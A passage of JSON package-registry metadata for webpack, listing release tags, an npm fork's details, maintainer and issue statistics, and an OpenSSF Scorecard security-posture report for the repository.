kg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-29T03:43:44.234Z","dependent_packages_count":1,"downloads":9,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":43.5886015547087,"dependent_repos_count":25.32799796580169,"dependent_packages_count":16.223928578504864,"stargazers_count":0.08354704634799201,"forks_count":0.5274268128286366,"average":17.150300391638375},"purl":"pkg:npm/%40juanger/webpack","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@juanger/webpack","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@juanger/webpack","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@juanger/webpack/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-29T00:23:50.084Z","issues_count":10165,"pull_requests_count":9442,"avg_time_to_close_issue":10849647.758436048,"avg_time_to_close_pull_request":2769754.713370066,"issues_closed_count":9898,"pull_requests_closed_count":8893,"pull_request_authors_count":1445,"issue_authors_count":6686,"avg_comments_per_issue":5.834825381210035,"avg_comments_per_pull_request":3.180152510061428,"merged_pull_requests_count":6029,"bot_issues_count":8,"bot_pull_requests_count":2914,"past_year_issues_count":80,"past_year_pull_requests_count":937,"past_year_avg_time_to_close_issue":868643.701754386,"past_year_avg_time_to_close_pull_request":363604.70405405405,"past_year_issues_closed_count":57,"past_year_pull_requests_closed_count":740,"past_year_pull_request_authors_count":79,"past_year_issue_authors_count":62,"past_year_avg_comments_per_issue":3.45,"past_year_avg_comments_per_pull_request":4.890074706510139,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":140,"past_year_merged_pull_requests_count":586,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1083,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"hai-x","count":128,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":112,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"ScriptedAlchemy","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"}],"active_maintainers":[{"login":"alexander-akait","count":438,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":85,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@juanger%2Fwebpack/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@juanger%2Fwebpack/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@juanger%2Fwebpack/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@juanger%2Fwebpack/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@juanger%2Fwebpack/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@juanger%2Fwebpack/codemeta","maintainers":[{"uuid":"juanger","login":"juanger","name":null,"email":"juanger@gmail.com","url":null,"packages_count":4,"html_url":"https://www.npmjs.com/~juanger","role":null,"created_at":"2022-11-20T18:09:08.123Z","updated_at":"2022-11-20T18:09:08.123Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/juanger/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5816876,"maintainers_count":1245095,"namespaces_count":426640,"keywords_count":889778,"github":"npm","metadata":{"funded_packages_count":192526,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-02T05:02:10.244Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":3909811,"name":"github.com/webpack/webpack","ecosystem":"go","description":"","homepage":null,"licenses":"mit","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":"github.com/webpack","versions_count":674,"first_release_published_at":"2013-12-19T22:23:28.000Z","latest_release_published_at":"2026-09-02T01:19:10.493Z","latest_release_number":"v5.110.3+incompatible","last_synced_at":"2026-09-03T01:25:43.556Z","created_at":"2022-04-12T01:07:08.255Z","updated_at":"2026-09-03T01:25:43.557Z","registry_url":"https://pkg.go.dev/github.com/webpack/webpack","install_command":"go get github.com/webpack/webpack","documentation_url":"https://pkg.go.dev/github.com/webpack/webpack#section-documentation","metadata":{},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-22T00:09:57.000Z","size":95341,"stargazers_count":65973,"open_issues_count":138,"forks_count":9525,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-22T13:33:37.681Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-22T08:28:27.000Z","dependencies_parsed_at":"2026-08-08T12:34:57.314Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":670,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 